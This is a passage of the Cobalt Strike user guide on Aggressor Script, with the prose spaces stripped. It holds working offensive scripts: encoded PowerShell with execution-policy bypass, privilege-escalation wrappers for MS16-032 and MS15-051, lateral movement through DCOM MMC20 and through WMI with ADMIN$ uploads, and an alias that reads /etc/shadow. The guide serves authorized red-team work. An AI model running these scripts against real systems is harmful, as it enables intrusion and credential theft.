||
eventsCobaltStrikefires.
|
||
on * {
|
||
local('$handle $event $args');
|
||
CobaltStrikeUserGuide www.fortra.com page:194
|
||
|
||
AggressorScript/DataModel
|
||
$event = shift(@_);
|
||
$args = join(" ", @_);
|
||
$handle = openf(">>eventspy.txt");
|
||
writeb($handle, "[ $+ $event $+ ] $args");
|
||
closef($handle);
|
||
}
|
||
Data Model
|
||
CobaltStrike'steamserverstoresyourhosts,services,credentials,andotherinformation.It
|
||
alsobroadcaststhisinformationandmakesitavailabletoallclients.
|
||
Data API
|
||
Usethe&data_queryfunctiontoqueryCobaltStrike'sdatamodel.Thisfunctionhasaccessto
|
||
allstateandinformationmaintainedbytheCobaltStrikeclient.Use&data_keystogetalistof
|
||
thedifferentpiecesofdatayoumayquery.ThisexamplequeriesalldatainCobaltStrike'sdata
|
||
modelandexportsittoatextfile:
|
||
command export {
|
||
local('$handle $model $row $entry $index');
|
||
$handle = openf(">export.txt");
|
||
foreach $model (data_keys()) {
|
||
println($handle, "== $model ==");
|
||
println($handle, data_query($model));
|
||
}
|
||
closef($handle);
|
||
println("See export.txt for the data.");
|
||
}
|
||
CobaltStrikeprovidesseveralfunctionsthatmakeitmoreintuitivetoworkwiththedatamodel.
|
||
Model Function Description
|
||
applications &applications SystemProfilerResults[View -> Applications]
|
||
archives &archives Engagementevents/activities
|
||
CobaltStrikeUserGuide www.fortra.com page:195
|
||
|
||
AggressorScript/Listeners
|
||
Model Function Description
|
||
beacons &beacons Activebeacons
|
||
credentials &credentials Usernames,passwords,etc.
|
||
downloads &downloads Downloadedfiles
|
||
keystrokes &keystrokes KeystrokesreceivedbyBeacon
|
||
screenshots &screenshots ScreenshotscapturedbyBeacon
|
||
services &services Servicesandserviceinformation
|
||
sites &sites AssetshostedbyCobaltStrike
|
||
socks &pivots SOCKSproxyserversandportforwards
|
||
targets &targets Hostsandhostinformation
|
||
Thesefunctionsreturnanarraywithonerowforeachentryinthedatamodel.Eachentryisa
|
||
dictionarywithdifferentkey/valuepairsthatdescribetheentry.
|
||
ThebestwaytounderstandthedatamodelistoexploreitthroughtheAggressorScript
|
||
console.GotoView -> Script Consoleandusethexcommandtoevaluateanexpression.For
|
||
example:
|
||
figure74-QueryingDatafromtheAggressorScriptconsole
|
||
Useon DATA_KEYtosubscribetochangestoaspecificdatamodel.
|
||
on keystrokes {
|
||
println("I have new keystrokes: $1");
|
||
}
|
||
Listeners
|
||
CobaltStrikeUserGuide www.fortra.com page:196
|
||
|
||
AggressorScript/Listeners
|
||
ListenersareCobaltStrike'sabstractionontopofpayloadhandlers.Alistenerisaname
|
||
attachedtopayloadconfigurationinformation(e.g.,protocol,host,port,etc.)and,insome
|
||
cases,apromisetosetupaservertoreceiveconnectionsfromthedescribedpayload.
|
||
Listener API
|
||
AggressorScriptaggregateslistenerinformationfromalloftheteamserversyou'recurrently
|
||
connectedto.Thismakesiteasytopasssessionstoanotherteamserver.Togetalistofall
|
||
listenernames,usethe&listenersfunction.Ifyouwouldliketoworkwithlocallistenersonly,use
|
||
&listeners_local.The&listener_infofunctionresolvesalistenernametoitsconfiguration
|
||
information.ThisexampledumpsalllistenersandtheirconfigurationtotheAggressorScript
|
||
console:
|
||
command listeners {
|
||
local('$name $key $value');
|
||
foreach $name (listeners()) {
|
||
println("== $name == ");
|
||
foreach $key => $value (listener_info($name)) {
|
||
println("$[20]key : $value");
|
||
}
|
||
}
|
||
}
|
||
Creating Listeners
|
||
Use&listener_create_exttocreatealistenerandstartapayloadhandlerassociatedwithit.
|
||
Choosing Listeners
|
||
Use&openPayloadHelpertoopenadialogthatlistsallavailablelisteners.Aftertheuserselects
|
||
alistener,thisdialogwillclose,andCobaltStrikewillrunacallbackfunction.Here'sthesource
|
||
codeforBeacon'sspawnmenu:
|
||
item "&Spawn" {
|
||
openPayloadHelper(lambda({
|
||
binput($bids, "spawn $1");
|
||
bspawn($bids, $1);
|
||
}, $bids => $1));
|
||
}
|
||
Stagers
|
||
CobaltStrikeUserGuide www.fortra.com page:197
|
||
|
||
AggressorScript/Listeners
|
||
Astagerisatinyprogramthatdownloadsapayloadandpassesexecutiontoit.Stagersare
|
||
idealforsize-constrainedpayloaddeliveryvector(e.g.,auser-drivenattack,amemory
|
||
corruptionexploit,oraone-linercommand.Stagersdohavedownsidesthough.Theyintroduce
|
||
anadditionalcomponenttoyourattackchainthatispossibletodisrupt.CobaltStrike'sstagers
|
||
arebasedonthestagersintheMetasploitFrameworkandthesearewell-signaturedand
|
||
understoodinmemoryaswell.Usepayload-specificstagersifyoumust;butit'sbesttoavoid
|
||
themotherwise.
|
||
Use&stagertoexportapayloadstagertiedtoaCobaltStrikepayload.Notallpayloadoptions
|
||
haveanexplicitpayloadstager.Notallstagershavex64options.
|
||
The&artifact_stagerfunctionwillexportaPowerShellscript,executable,orDLLthatrunsa
|
||
stagerassociatedwithaCobaltStrikepayload.
|
||
Local Stagers
|
||
Forpost-exploitationactionsthatrequiretheuseofastager,usealocalhost-onlybind_tcp
|
||
stager.Theuseofthisstagerallowsastaging-requiredpost-exploitationactiontoworkwithall
|
||
ofCobaltStrike'spayloadsequally.
|
||
Use&stager_bind_tcptoexportabind_tcppayloadstager.Use&beacon_stage_tcptodelivera
|
||
payloadtothisstager.
|
||
&artifact_generalwillacceptthisarbitrarycodeandgenerateaPowerShellscript,executable,or
|
||
DLLtohostit.
|
||
Named Pipe Stager
|
||
CobaltStrikedoeshaveabind_pipestagerthatisusefulforsomelateralmovementsituations.
|
||
Thisstagerisx86only.Use&stager_bind_pipetoexportthisbind_pipestager.Use&beacon_
|
||
stage_pipetodeliverapayloadtothisstager.
|
||
&artifact_generalwillacceptthisarbitrarycodeandgenerateaPowerShellscript,executable,or
|
||
DLLtohostit.
|
||
Stageless Payloads
|
||
Use&payloadtoexportaCobaltStrikepayload(initsentirety)asaready-to-runposition-
|
||
independentprogram.
|
||
&artifact_payloadwillexportaPowerShellscript,executable,orDLLthatcontaintsthispayload.
|
||
CobaltStrikeUserGuide www.fortra.com page:198
|
||
|
||
AggressorScript/Beacon
|
||
Beacon
|
||
BeaconisCobaltStrike'sasynchronouspost-exploitationagent.Inthischapter,wewillexplore
|
||
optionstoautomateBeaconwithCobaltStrike'sAggressorScript.
|
||
Metadata
|
||
CobaltStrikeassignsasessionIDtoeachBeacon.ThisIDisarandomnumber.CobaltStrike
|
||
associatestasksandmetadatawitheachBeaconID.Use&beaconstoquerymetadataforall
|
||
currentBeaconsessions.Use&beacon_infotoquerymetadataforaspecificBeaconsession.
|
||
Here'sascripttodumpinformationabouteachBeaconsession:
|
||
command beacons {
|
||
local('$entry $key $value');
|
||
foreach $entry (beacons()) {
|
||
println("== " . $entry['id'] . " ==");
|
||
foreach $key => $value ($entry) {
|
||
println("$[20]key : $value");
|
||
}
|
||
println();
|
||
}
|
||
}
|
||
Aliases
|
||
YoumaydefinenewBeaconcommandswiththealiaskeyword.Here'sahelloaliasthatprints
|
||
HelloWorldinaBeaconconsole.
|
||
alias hello {
|
||
blog($1, "Hello World!");
|
||
}
|
||
Puttheaboveintoascript,loaditintoCobaltStrike,andopenaBeaconconsole.Thenenterin
|
||
thehellocommandandpressenter.CobaltStrikewilleventabcompleteyouraliasesforyou.
|
||
YoushouldseeHelloWorld!intheBeaconconsole.
|
||
Youmayalsousethe&aliasfunctiontodefineanalias.
|
||
CobaltStrikepassesthefollowingargumentstoanalias:$0isthealiasnameandarguments
|
||
withoutanyparsing.$1istheIDoftheBeaconthealiaswastypedfrom.Thearguments$2and
|
||
oncontainanindividualargumentpassedtothealias.Thealiasparsersplitsargumentsby
|
||
spaces.Usersmayuse"doublequotes"togroupwordsintooneargument.
|
||
CobaltStrikeUserGuide www.fortra.com page:199
|
||
|
||
AggressorScript/Beacon
|
||
alias saywhat {
|
||
blog($1, "My arguments are: " . substr($0, 8) . "\n");
|
||
}
|
||
YoumayalsoregisteryouraliaseswithBeacon'shelpsystem.Use&beacon_command_register
|
||
toregisteracommand.
|
||
AliasesareaconvenientwaytoextendBeaconandmakeityourown.Aliasesalsoplaywellinto
|
||
CobaltStrike'sthreatemulationrole.Youmayusealiasestoscriptcomplexpost-exploitation
|
||
actionsinawaythatmapstoanotheractor'stradecraft.Yourredteamoperatorssimplyneed
|
||
toloadascript,learnthealiases,andtheycanoperatewithyourscriptedtacticsinawaythat's
|
||
consistentwiththeactoryou'reemulating.
|
||
Reacting to new Beacons
|
||
AcommonuseofAggressorScriptistoreacttonewBeacons.Usethebeacon_initialeventto
|
||
setupcommandsthatshouldrunwhenaBeaconchecksinforthefirsttime.
|
||
on beacon_initial {
|
||
# do some stuff
|
||
}
|
||
The$1argumenttobeacon_initialistheIDofthenewBeacon.
|
||
Thebeacon_initialeventfireswhenaBeaconreportsmetadataforthefirsttime.Thismeansa
|
||
DNSBeaconwillnotfirebeacon_initialuntilitsaskedtorunacommand.TointeractwithaDNS
|
||
Beaconthatcallshomeforthefirsttime,usethebeacon_initial_emptyevent.
|
||
# some sane defaults for DNS Beacon
|
||
on beacon_initial_empty {
|
||
bmode($1, "dns-txt");
|
||
bcheckin($1);
|
||
}
|
||
Popup Menus
|
||
YoumayalsoaddontoBeaconspopupmenu.Aliasesarenice,buttheyonlyaffectoneBeacon
|
||
atatime.Throughapopupmenu,yourscript'susersmaytaskmultipleBeaconstotakethe
|
||
desiredactionatonetime.
|
||
Thebeacon_topandbeacon_bottompopuphooksletyouaddtothedefaultBeaconmenu.
|
||
TheargumenttotheBeaconpopuphooksisanarrayofselectedBeaconIDs.
|
||
CobaltStrikeUserGuide www.fortra.com page:200
|
||
|
||
AggressorScript/Beacon
|
||
popup beacon_bottom {
|
||
item "Run All..." {
|
||
prompt_text("Which command to run?", "whoami /groups", lambda({
|
||
binput(@ids, "shell $1");
|
||
bshell(@ids, $1);
|
||
}, @ids => $1));
|
||
}
|
||
}
|
||
The Logging Contract
|
||
CobaltStrike3.0andlaterdoadecentjoboflogging.EachcommandissuedtoaBeaconis
|
||
attributedtoanoperatorwithadateandtimestamp.TheBeaconconsoleintheCobaltStrike
|
||
clienthandlesthislogging.Scriptsthatexecutecommandsfortheuserdonotrecord
|
||
commandsoroperatorattributiontothelog.Thescriptisresponsiblefordoingthis.Usethe
|
||
&binputfunctiontodothis.ThiscommandwillpostamessagetotheBeacontranscriptasif
|
||
theuserhadtypedacommand.
|
||
Acknowledging Tasks
|
||
Customaliasesshouldcallthe&btaskfunctiontodescribetheactiontheuseraskedfor.This
|
||
outputissenttotheBeaconlogandit'salsousedinCobaltStrike'sreports.MostAggressor
|
||
ScriptfunctionsthatissueatasktoBeaconwillprinttheirownacknowledgementmessage.If
|
||
you'dliketosuppressthis,add!tothefunctionname.Thiswillrunthequietvariantofthe
|
||
function.Aquietfunctiondoesnotprintataskacknowledgement.Forexample,&bshell!isthe
|
||
quietvariantof&bshell.
|
||
alias survey {
|
||
btask($1, "Surveying the target!", "T1082");
|
||
bshell!($1, "echo Groups && whoami /groups");
|
||
bshell!($1, "echo Processes && tasklist /v");
|
||
bshell!($1, "echo Connections && netstat -na | findstr \"EST\"");
|
||
bshell!($1, "echo System Info && systeminfo");
|
||
}
|
||
Thelastargumentto&btaskisacomma-separatedlistofATT&CKtechniques.T1082is
|
||
SystemInformationDiscovery.ATT&CKisaprojectfromtheMITRECorporationtocategorize
|
||
anddocumentattackeractions.CobaltStrikeusesthesetechniquestobuilditsTactics,
|
||
Techniques,andProceduresreport.YoumaylearnmoreaboutMITRE'sATT&CKmatrixat:
|
||
https://attack.mitre.org/
|
||
Conquering the Shell
|
||
CobaltStrikeUserGuide www.fortra.com page:201
|
||
|
||
AggressorScript/Beacon
|
||
Aliasesmayoverrideexistingcommands.Here'sanAggressorScriptimplementationof
|
||
Beacon'spowershellcommand:
|
||
alias powershell {
|
||
local('$args $cradle $runme $cmd');
|
||
# $0 is the entire command with no parsing.
|
||
$args = substr($0, 11);
|
||
# generate the download cradle (if one exists) for an imported PowerShell script
|
||
$cradle = beacon_host_imported_script($1);
|
||
# encode our download cradle AND cmdlet+args we want to run
|
||
$runme = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
|
||
# Build up our entire command line.
|
||
$cmd = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
|
||
# task Beacon to run all of this.
|
||
btask($1, "Tasked beacon to run: $args", "T1086");
|
||
beacon_execute_job($1, "powershell", $cmd, 1);
|
||
}
|
||
ThisaliasdefinesapowershellcommandforusewithinBeacon.Weuse$0tograbthedesired
|
||
PowerShellstringwithoutanyparsing.It'simportanttoaccountforanimportedPowerShell
|
||
script(iftheuserimportedonewithpowershell-import).Weuse&beacon_host_imported_script
|
||
forthis.ThisfunctiontasksBeacontohostanimportedscriptonaone-offwebserverboundto
|
||
localhost.ItalsoreturnsastringwiththePowerShelldownloadcradlethatdownloadsand
|
||
evaluatestheimportedscript.The-EncodedCommandflaginPowerShellacceptsascriptasa
|
||
base64string.There'sonewrinkle.WemustencodeourstringaslittleendianUTF16text.This
|
||
aliasuses&str_encodetodothis.The&btaskcalllogsthisrunofPowerShellandassociatesit
|
||
withtacticT1086.The&beacon_execute_jobfunctiontasksBeacontorunpowershelland
|
||
reportitsoutputbacktoBeacon.
|
||
Similarly,wemayre-definetheshellcommandinBeacontoo.Thisaliascreatesanalternate
|
||
shellcommandthathidesyourWindowscommandsinanenvironmentvariable.
|
||
alias shell {
|
||
local('$args');
|
||
$args = substr($0, 6);
|
||
btask($1, "Tasked beacon to run: $args (OPSEC)", "T1059");
|
||
bsetenv!($1, "_", $args);
|
||
beacon_execute_job($1, "%COMSPEC%", " /C %_%", 0);
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:202
|
||
|
||
AggressorScript/Beacon
|
||
The&btaskcalllogsourintentionandassociatesitwithtacticT1059.The&bsetenvassignsour
|
||
Windowscommandtotheenvironmentvariable_.Thescriptuses!tosuppress&bsetenv'stask
|
||
acknowledgement.The&beacon_execute_jobfunctionruns%COMSPEC%withargumnents /C
|
||
%_%.Thisworksbecause&beacon_execute_jobwillresolveenvironmentvariablesinthe
|
||
commandparameter.Itdoesnotresolveenvironmentvariablesintheargumentparameter.
|
||
Becauseofthis,wecanuse%COMSPEC%tolocatetheuser'sshell,butpass%_%asan
|
||
argumentwithoutimmediateinterpolation.
|
||
Privilege Escalation (Run a Command)
|
||
Beacon'srunasadmincommandattemptstorunacommandinanelevatedcontext.This
|
||
commandacceptsanelevatornameandacommand(commandANDarguments:)).The
|
||
&beacon_elevator_registerfunctionmakesanewelevatoravailabletorunasadmin..
|
||
beacon_elevator_register("ms16-032", "Secondary Logon Handle Privilege
|
||
Escalation (CVE-2016-099)", &ms16_032_elevator);
|
||
Thiscoderegisterstheelevatorms16-032withBeacon'srunasadmincommand.Adescription
|
||
isgivenaswell.Whentheusertypesrunasadmin ms16-032 notepad.exe,CobaltStrikewill
|
||
run&ms16_032_elevatorwiththesearguments:$1isthebeaconsessionID.$2isthe
|
||
commandandarguments.Here'sthe&ms16_032_elevatorfunction:
|
||
# Integrate ms16-032
|
||
# Sourced from Empire:
|
||
https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
|
||
sub ms16_032_elevator {
|
||
local('$handle $script $oneliner');
|
||
# acknowledge this command
|
||
btask($1, "Tasked Beacon to execute $2 via ms16-032", "T1068");
|
||
# read in the script
|
||
$handle = openf(getFileProper(script_resource("modules"), "Invoke-
|
||
MS16032.ps1"));
|
||
$script = readb($handle, -1);
|
||
closef($handle);
|
||
# host the script in Beacon
|
||
$oneliner = beacon_host_script($1, $script);
|
||
# run the specified command via this exploit.
|
||
bpowerpick!($1, "Invoke-MS16032 -Command \" $+ $2 $+ \"", $oneliner);
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:203
|
||
|
||
AggressorScript/Beacon
|
||
Thisfunctionuses&btasktoacknowledgetheactiontotheuser.Thedescriptionin&btaskwill
|
||
goinCobaltStrike'slogsandreportsaswell.T1068istheMITREATT&CKtechniquethat
|
||
correspondstothisaction.
|
||
Theendofthisfunctionuses&bpowerpicktorunInvoke-MS16032withanargumenttorun
|
||
ourcommand.ThePowerShellscriptthatimplementsInvoke-MS16032istoolargeforaone-
|
||
linerthough.Tomitigatethis,theelevatorfunctionuses&beacon_host_scripttohostthelarge
|
||
scriptwithinBeacon.The&beacon_host_scriptfunctionreturnsaone-linertograbthishosted
|
||
scriptandevaluateit.
|
||
Theexclamationpointafter&bpowerpicktellsAggressorScripttocallthequietvariantsofthis
|
||
function.Quietfunctionsdonotprintataskdescription.
|
||
There'snotmuchelsetodescribehere.Acommandelevatorscriptjustneedstoruna
|
||
command.:)
|
||
Privilege Escalation (Spawn a Session)
|
||
Beacon'selevatecommandattemptstospawnanewsessionwithelevatedprivileges.This
|
||
commandacceptsanexploitnameandalistener.The&beacon_exploit_registerfunction
|
||
makesanewexploitavailabletoelevate.
|
||
beacon_exploit_register("ms15-051", "Windows ClientCopyImage Win32k Exploit
|
||
(CVE 2015-1701)", &ms15_051_exploit);
|
||
Thiscoderegisterstheexploitms15-051withBeacon'selevatecommand.Adescriptionis
|
||
givenaswell.Whentheusertypeselevate ms15-051 foo,CobaltStrikewillrun&ms15_051_
|
||
exploitwiththesearguments:$1isthebeaconsessionID.$2isthelistenername(e.g.,foo).
|
||
Here'sthe&ms15_051_exploitfunction:
|
||
# Integrate windows/local/ms15_051_client_copy_image from Metasploit
|
||
# https://github.com/rapid7/metasploit-
|
||
framework/blob/master/modules/exploits/windows/local/ms15_051_client_copy_image.rb
|
||
sub ms15_051_exploit {
|
||
local('$stager $arch $dll');
|
||
# acknowledge this command
|
||
btask($1, "Task Beacon to run " . listener_describe($2) . " via ms15-051", "T1068");
|
||
# tune our parameters based on the target arch
|
||
if (-is64 $1) {
|
||
$arch = "x64";
|
||
$dll = getFileProper(script_resource("modules"), "cve-2015-1701.x64.dll");
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:204
|
||
|
||
AggressorScript/Beacon
|
||
else {
|
||
$arch = "x86";
|
||
$dll = getFileProper(script_resource("modules"), "cve-2015-1701.x86.dll");
|
||
}
|
||
# generate our shellcode
|
||
$stager = payload($2, $arch);
|
||
# spawn a Beacon post-ex job with the exploit DLL
|
||
bdllspawn!($1, $dll, $stager, "ms15-051", 5000);
|
||
# link to our payload if it's a TCP or SMB Beacon
|
||
beacon_link($1, $null, $2);
|
||
}
|
||
Thisfunctionuses&btasktoacknowledgetheactiontotheuser.Thedescriptionin&btaskwill
|
||
goinCobaltStrike'slogsandreportsaswell.T1068istheMITREATT&CKtechniquethat
|
||
correspondstothisaction.
|
||
ThisfunctionrepurposesanexploitfromtheMetasploitFramework.Thisexploitiscompiledas
|
||
cve-2015-1701.[arch].dllwithx86andx64variants.Thisfunction'sfirsttaskistoreadthe
|
||
exploitDLLthatcorrespondstothetargetsystem'sarchitecture.The-is64predicatehelpswith
|
||
this.
|
||
The&payloadfunctiongeneratesrawoutputforourlistenernameandthespecified
|
||
architecture.
|
||
The&bdllspawnfunctionspawnsatemporaryprocess,injectsourexploitDLLintoit,and
|
||
passesourexportedpayloadasanargument.ThisisthecontracttheMetasploitFramework
|
||
usestopassshellcodetoitsprivilegeescalationexploitsimplementedasReflectiveDLLs.
|
||
Finally,thisfunctioncalls&beacon_link.IfthetargetlistenerisanSMBorTCPBeaconpayload,
|
||
&beacon_linkwillattempttoconnecttoit.
|
||
Lateral Movement (Run a Command)
|
||
Beacon'sremote-execcommandattemptstorunacommandonaremotetarget.This
|
||
commandacceptsaremote-execmethod,atarget,andacommand+arguments.The
|
||
&beacon_remote_exec_method_registerfunctionisbothareallylongfunctionnameandmakes
|
||
anewmethodavailabletoremote-exec.
|
||
beacon_remote_exec_method_register("com-mmc20", "Execute command via
|
||
MMC20.Application COM Object", &mmc20_exec_method);
|
||
CobaltStrikeUserGuide www.fortra.com page:205
|
||
|
||
AggressorScript/Beacon
|
||
Thiscoderegisterstheremote-execmethodcom-mmc20withBeacon'sremote-exec
|
||
command.Adescriptionisgivenaswell.Whentheusertypesremote-exec com-mmc20
|
||
c:\windows\temp\malware.exe,CobaltStrikewillrun&mmc20_exec_methodwiththese
|
||
arguments:$1isthebeaconsessionID.$2isthetarget.$3isthecommandandarguments.
|
||
Here'sthe&mmc20_exec_methodfunction:
|
||
sub mmc20_exec_method {
|
||
local('$script $command $args');
|
||
# state what we're doing.
|
||
btask($1, "Tasked Beacon to run $3 on $2 via DCOM", "T1175");
|
||
# separate our command and arguments
|
||
if ($3 ismatch '(.*?) (.*)') {
|
||
($command, $args) = matched();
|
||
}
|
||
else {
|
||
$command = $3;
|
||
$args = "";
|
||
}
|
||
# build script that uses DCOM to invoke ExecuteShellCommand on MMC20.Application
|
||
object
|
||
$script = '[activator]::CreateInstance([type]::GetTypeFromProgID
|
||
("MMC20.Application", "';
|
||
$script .= $2;
|
||
$script .= '")).Document.ActiveView.ExecuteShellCommand("';
|
||
$script .= $command;
|
||
$script .= '", $null, "';
|
||
$script .= $args;
|
||
$script .= '", "7");';
|
||
# run the script we built up
|
||
bpowershell!($1, $script, "");
|
||
}
|
||
Thisfunctionuses&btasktoacknowledgethetaskanddescribeittotheoperator(andlogsand
|
||
reports).T1175istheMITREATT&CKtechniquethatcorrespondstothisaction.Ifyouroffense
|
||
techniquedoesnotfitintoMITREATT&CK,don'tfret.Somecustomersareverymuchreadyfor
|
||
achallengeandbenefitwhentheirredteamcreativelydeviatesfromwhatareknownoffense
|
||
techniques.Doconsiderwritingablogpostaboutitfortherestofuslater.
|
||
Thisfunctionthensplitsthe$3argumentintocommandandargumentportions.Thisisdone
|
||
becausethetechniquerequiresthatthesevaluesareseparate.
|
||
Afterwards,thisfunctionbuildsupaPowerShellcommandstringthatlookslikethis:
|
||
CobaltStrikeUserGuide www.fortra.com page:206
|
||
|
||
AggressorScript/Beacon
|
||
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application",
|
||
"TARGETHOST")).Document.ActiveView.ExecuteShellCommand
|
||
("c:\windows\temp\a.exe", $null, "", "7");
|
||
ThiscommandusestheMMC20.ApplicationCOMobjecttoexecuteacommandonaremote
|
||
target.ThismethodwasdiscoveredasalateralmovementoptionbyMattNelson:
|
||
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-
|
||
object/
|
||
Thisfunctionuses&bpowershelltorunthisPowerShellscript.Thesecondargumentisan
|
||
emptystringtosuppressthedefaultdownloadcradle(iftheoperatorranpowershell-import
|
||
previously).Ifyouprefer,youcouldmodifythisexampletouse&bpowerpicktorunthisone-liner
|
||
withoutpowershell.exe.
|
||
Thisexampleisoneofthemajormotivatorsformetoaddtheremote-execcommandandAPI
|
||
toCobaltStrike.Thisisanexcellent"executethiscommand"primitive,butend-to-end
|
||
weaponization(spawningasession)usuallyincludesusingthisprimitivetorunaPowerShell
|
||
one-linerontarget.Foralotofreasons,thisisnottherightchoiceinmanyengagements.
|
||
Exposingthisprimitivethroughtheremote-execinterfacegivesyouachoiceabouthowtobest
|
||
makeuseofthiscapability(withoutforcingchoicesyoudon'twantmadeforyou).
|
||
Lateral Movement (Spawn a Session)
|
||
Beacon'sjumpcommandattemptstospawnanewsessiononaremotetarget.Thiscommand
|
||
acceptsanexploitname,atarget,andalistener.The&beacon_remote_exploit_registerfunction
|
||
makesanewmoduleavailabletojump.
|
||
beacon_remote_exploit_register("wmi", "x86", "Use WMI to run a Beacon
|
||
payload", lambda(&wmi_remote_spawn, $arch => "x86"));
|
||
beacon_remote_exploit_register("wmi64", "x64", "Use WMI to run a Beacon
|
||
payload", lambda(&wmi_remote_spawn, $arch => "x64"));
|
||
Theabovefunctionsregisterwmiandwmi64optionsforusewiththejumpcommand.The
|
||
&lambdafunctionmakesacopyof&wmi_remote_spawnandsets$archasastaticvariable
|
||
scopedtothatfunctioncopy.Usingthismethod,we'reabletousethesamelogictopresenttwo
|
||
lateralmovementoptionsfromoneimplementation.Here'sthe&wmi_remote_spawnfunction:
|
||
# $1 = bid, $2 = target, $3 = listener
|
||
sub wmi_remote_spawn {
|
||
local('$name $exedata');
|
||
btask($1, "Tasked Beacon to jump to $2 (" . listener_describe($3) . ") via WMI",
|
||
"T1047");
|
||
CobaltStrikeUserGuide www.fortra.com page:207
|
||
|
||
AggressorScript/SSHSessions
|
||
# we need a random file name.
|
||
$name = rand(@("malware", "evil", "detectme")) . rand(100) . ".exe";
|
||
# generate an EXE. $arch defined via &lambda when this function was registered with
|
||
# beacon_remote_exploit_register
|
||
$exedata = artifact_payload($3, "exe", $arch);
|
||
# upload the EXE to our target (directly)
|
||
bupload_raw!($1, "\\\\ $+ $2 $+ \\ADMIN\$\\ $+ $name", $exedata);
|
||
# execute this via WMI
|
||
brun!($1, "wmic /node:\" $+ $2 $+ \" process call create \"\\\\ $+ $2 $+ \\ADMIN\$\\
|
||
$+ $name $+ \"");
|
||
# assume control of our payload (if it's an SMB or TCP Beacon)
|
||
beacon_link($1, $2, $3);
|
||
}
|
||
The&btaskfunctionfulfillsourobligationtologwhattheuserintendedtodo.TheT1047
|
||
argumentassociatesthisactionwithTactic1047inMITRE'sATT&CKmatrix.
|
||
The&artfiact_payloadfunctiongeneratesastagelessartifacttorunourpayload.Itusesthe
|
||
ArtifactKithookstogeneratethisfile.
|
||
The&bupload_rawfunctionuploadstheartifactdatatothetarget.Thisfunctionuses
|
||
\\target\ADMIN$\filename.exetodirectlywritetheEXEtotheremotetargetviaanadmin-only
|
||
share.
|
||
&brunrunswmic /node:"target" process call create "\\target\ADMIN$\filename.exe"to
|
||
executethefileontheremotetarget.
|
||
&beacon_linkassumescontrolofthepayload,ifit'sanSMBorTCPBeacon.
|
||
SSH Sessions
|
||
CobaltStrike'sSSHclientspeakstheSMBBeaconprotocolandimplementsasub-setof
|
||
Beacon'scommandsandfunctions.FromtheperspectiveofAggressorScript,anSSHsession
|
||
isaBeaconsessionwithfewercommands.
|
||
What type of session is it?
|
||
MuchlikeBeaconsessions,SSHsessionshaveanID.CobaltStrikeassociatestasksand
|
||
metadatawiththisID.The&beaconsfunctionwillalsoreturninformationaboutallCobaltStrike
|
||
CobaltStrikeUserGuide www.fortra.com page:208
|
||
|
||
AggressorScript/SSHSessions
|
||
sessions(SSHsessionsANDBeaconsessions).Usethe-issshpredicatetotestifasessionis
|
||
anSSHsession.The-isbeaconpredicatetestsifasessionisaBeaconsession.
|
||
Here'safunctiontofilter&beaconstoSSHsessionsonly:
|
||
sub ssh_sessions {
|
||
return map({
|
||
if (-isssh $1['id']) {
|
||
return $1;
|
||
}
|
||
else {
|
||
return $null;
|
||
}
|
||
}, beacons());
|
||
}
|
||
Aliases
|
||
YoumayaddcommandstotheSSHconsolewiththessh_aliaskeyword.Here'sascripttoalias
|
||
hashdumptograb/etc/shadowifyou'reanadmin.
|
||
ssh_alias hashdump {
|
||
if (-isadmin $1) {
|
||
bshell($1, "cat /etc/shadow");
|
||
}
|
||
else {
|
||
berror($1, "You're (probably) not an admin");
|
||
}
|
||
}
|
||
Puttheaboveintoascript,loaditintoCobaltStrike,andtypehashdumpinsideofanSSH
|
||
console.CobaltStrikewilltabcompleteSSHaliasestoo.
|
||
Youmayalsousethe&ssh_aliasfunctiontodefineanSSHalias.
|
||
CobaltStrikepassesthefollowingargumentstoanalias:$0isthealiasnameandarguments
|
||
withoutanyparsing.$1istheIDofthesessionthealiaswastypedfrom.Thearguments$2and
|
||
oncontainanindividualargumentpassedtothealias.Thealiasparsersplitsargumentsby
|
||
spaces.Usersmayuse"doublequotes"togroupwordsintooneargument.
|
||
YoumayalsoregisteryouraliaseswiththeSSHconsole'shelpsystem.Use&ssh_command_
|
||
registertoregisteracommand.
|
||
Reacting to new SSH Sessions
|
||
CobaltStrikeUserGuide www.fortra.com page:209
|
||
|
||
AggressorScript/OtherTopics
|
||
AggressorScriptsmayreacttonewSSHsessionstoo.Usethessh_initialeventtosetup
|
||
commandsthatshouldrunwhenaSSHsessionbecomesavailable.
|
||
on ssh_initial {
|
||
# do some stuff
|
||
}
|
||
The$1argumenttossh_initialistheIDofthenewsession.
|
||
Popup Menus
|
||
YoumayalsoaddontotheSSHpopupmenu.Thesshpopuphookletsyouadditemstothe
|
||
SSHmenu.TheargumenttotheSSHpopupmenuisanarrayofselectedsessionIDs.
|
||
popup ssh {
|
||
item "Run All..." {
|
||
prompt_text("Which command to run?", "w", lambda({
|
||
binput(@ids, "shell $1");
|
||
bshell(@ids, $1);
|
||
}, @ids => $1));
|
||
}
|
||
}
|
||
You'llnoticethatthisexampleisverysimilartotheexampleusedintheBeaconchapter.For
|
||
example,Iuse&binputtopublishinputtotheSSHconsole.Iuse&bshelltotasktheSSH
|
||
sessiontorunacommand.Thisisallcorrect.Remember,internally,anSSHsessionisa
|
||
BeaconsessionasfarasmostofCobaltStrike/AggressorScriptisconcerned.
|
||
Other Topics
|
||
CobaltStrikeoperatorsandscriptscommunicateglobaleventstothesharedeventlog.
|
||
AggressorScriptsmayrespondtothisinformationtoo.Theeventlogeventsbeginwith
|
||
event_.Tolistforglobalnotifications,usetheevent_notifyhook.
|
||
on event_notify {
|
||
println("I see: $1");
|
||
}
|
||
Topostamessagetothesharedeventlog,usethe&sayfunction.
|
||
say("Hello World");
|
||
CobaltStrikeUserGuide www.fortra.com page:210
|
||
|
||
AggressorScript/OtherTopics
|
||
Topostamajoreventornotification(notnecessarilychit-chat),usethe&elogfunction.The
|
||
deconflictionserverwillautomaticallytimestampandstorethisinformation.Thisinformation
|
||
willalsoshowupinCobaltStrike'sActivityReport.
|
||
elog("system shutdown initiated");
|
||
Timers
|
||
Ifyou'dliketoexecuteataskperiodically,thenyoushoulduseoneofAggressorScript'stimer
|
||
